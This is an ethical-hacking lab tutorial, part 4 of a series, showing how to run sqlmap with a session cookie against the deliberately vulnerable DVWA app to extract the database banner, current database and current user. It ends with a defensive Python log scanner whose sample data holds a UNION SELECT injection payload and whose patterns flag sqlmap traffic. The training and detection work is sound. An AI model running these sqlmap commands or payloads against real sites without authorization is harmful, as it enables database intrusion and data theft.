SQL injection lab PT.4 – Using SqlMap to Obtain Current User and Database


Welcome back, Gurkhas, to SQL injection lab PT.4!

By: Bijay Acharya | Add him on Facebook: https://www.facebook.com/nhcbijay.ach | Follow him on Twitter: @acharya_bijay | Subscribe to his tutorial channel for ethical hacking videos (in Nepali): Student Video Tutorial

Section 10: Using SqlMap to Obtain Current User and Database 

1. Verify sqlmap.py exists
o Instructions:
1. cd /pentest/database/sqlmap
2. ls -l sqlmap.py


2. Obtain Database User For DVWA
o Notes(FYI):
1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
o Instructions:
1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
* -u, Target URL
* --cookie, HTTP Cookie header
* -b, Retrieve DBMS banner
* --current-db, Retrieve DBMS current database
* --current-user, Retrieve DBMS current user


3. Do you want to keep testing?
o Instructions:
1. keep testing? y
2. skip payloads? y


4. Viewing Results
o Instructions:
1. For the web application DVWA, the database name is "dvwa", and the programs that communicate with the database do so as "root@localhost".
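
A defender's view of the run above, as an added example (not code from the original tutorial or from sqlmap): a Python check over web server logs that flags requests to the DVWA SQLi page when the User-Agent is sqlmap's default, or when the id parameter is not a plain number or carries SQL syntax. The log lines, client IPs, sqlmap version string and function names are constructed for illustration and assume Apache's combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines (sample data, not from a real host).
SAMPLE_LOG = [
    '192.168.1.20 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.1.105 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.0 (https://sqlmap.org)"',
    '192.168.1.105 - - [01/Jan/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%20CURRENT_USER%28%29%2CDATABASE%28%29%23&Submit=Submit HTTP/1.1" 200 4610 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # the page's id parameter is a row number
SQL_RE = re.compile(r"\b(union|select|current_user|database|sleep|benchmark)\b|--|#|'", re.I)
TARGET_PATH = "/dvwa/vulnerabilities/sqli/"

def classify(line):
    """Return (client_ip, reasons) for one log line; reasons is empty when clean."""
    m = LINE_RE.match(line)
    if not m:
        return None, ["unparsed"]
    ip, target, agent = m.groups()
    url = urlsplit(target)
    reasons = []
    # The default User-Agent names the tool; it can be changed, so it is only one signal.
    if agent.lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    if url.path == TARGET_PATH:
        # parse_qs URL-decodes each value, so %27 is inspected as a quote character.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                reasons.append("non-numeric-id")
            if SQL_RE.search(value):
                reasons.append("sql-syntax-in-id")
    return ip, reasons

def scan(lines):
    """Return [(client_ip, reasons)] for every line with at least one reason."""
    results = (classify(line) for line in lines)
    return [(ip, reasons) for ip, reasons in results if reasons]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The non-numeric-id rule is the more durable signal, since it depends only on what the application expects and not on how the client identifies itself.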


OK Gurkhas, we'll continue this in the next part. Check out our social network site for hackers here: hcnepal.com
